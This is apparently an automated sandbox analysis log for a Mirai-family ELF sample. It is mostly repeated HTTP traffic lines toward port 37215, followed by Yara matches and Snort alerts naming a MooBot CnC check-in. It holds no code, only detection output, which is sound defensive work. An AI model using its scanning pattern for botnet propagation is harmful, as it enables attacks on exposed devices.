                  Source: unknownNetwork traffic detected: HTTP traffic on port 52140 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57070 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45828 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52712 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60510 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43934 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52016 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38496 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33540 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55358 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57298 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51428 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36194 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43902 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39090 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60584 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46372 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48086 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60784 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56006 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36266 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54242 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36708 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53278 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46108 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45616 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45078 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42490 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51020 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57132 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52312 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33212 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56736 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58008 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42728 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44874 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42944 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55618 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34356 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32896 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41576 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35154 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46530 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40676 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49564 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54880 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40870 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56838 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38652 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52450 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52278 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35346 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40576 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41414 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34696 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60508 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38798 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37300 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37272 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39902 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43418 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58662 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51652 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57976 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45360 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36172 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50420 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41654 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41042 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57684 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36746 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43062 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39072 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53088 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50380 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47206 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37186 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50842 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57070 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56760 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34884 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58418 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35752 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33062 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41788 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51680 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54082 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60832 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47416 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50170 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54396 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43756 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52248 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47718 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35830 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37516 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49444 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39398 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42396 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47892 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52122 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35980 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44190 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48892 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42574 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43546 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48604 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40856 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35010 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57512 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34364 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36912 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42784 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54424 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54936 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41482 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36592 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47300 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59720 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52898 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51050 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48166 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46280 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50460 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59100 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56852 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49136 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56194 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45118 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56742 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34402 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34354 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40130 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41948 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45414 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35718 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48014 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40824 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44572 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38606 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56846 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43764 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37926 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56626 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53066 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48692 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36690 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48152 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45828 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52712 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52404 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42858 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56904 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53912 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38292 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36964 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54420 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51028 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53044 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55646 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44380 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43706 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48954 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41520 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42312 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44188 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60348 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43278 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51536 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48260 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33700 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34698 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46238 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38216 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52398 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44220 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43852 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47518 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44698 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50650 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59908 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59238 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41356 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38014 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46742 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37214 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58570 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34648 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39522 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58772 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52570 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37678 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44106 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56850 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53144 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58142 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34728 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33964 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59308 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58622 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39082 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60510 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43934 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51444 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48438 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52140 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49670 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43204 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59990 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34286 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55676 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37302 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39262 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39272 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60188 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33154 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34734 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43964 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58546 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48786 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33170 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54718 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47074 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36704 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52356 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34516 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58548 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58578 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35604 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46102 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50644 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42390 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42546 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59508 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52112 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34358 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37132 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34258 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35168 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43794 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37270 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58002 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56276 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60662 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33590 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43422 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51030 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37146 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48920 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55422 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54638 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36408 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 38180 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41448 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48146 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58932 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52120 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52600 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60114 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59730 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41542 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40186 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49566 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60808 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39924 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43532 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53378 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 37018 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51298 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36764 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36138 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50540 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55152 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57228 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35438 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51060 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52622 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42534 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34774 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50966 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51318 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51910 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40792 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55952 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 45966 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55732 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42228 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39794 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60586 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58924 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 40174 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57664 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56682 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34336 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54874 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32910 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41410 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42870 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 48132 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33214 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43968 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36768 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54342 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59732 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46844 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53526 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55388 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56566 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 42010 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 33080 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51712 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51412 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35432 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43166 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 39440 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 44570 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58858 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 41198 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47438 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 34704 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46144 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 43514 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 36002 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35360 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49204 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50588 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59730 -> 37215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 35220 -> 37215

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: bolonetwork.x86.elf, type: SAMPLE
                  Source: Yara matchFile source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTR
                  Source: Yara matchFile source: bolonetwork.x86.elf, type: SAMPLE
                  Source: Yara matchFile source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSnort IDS: ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
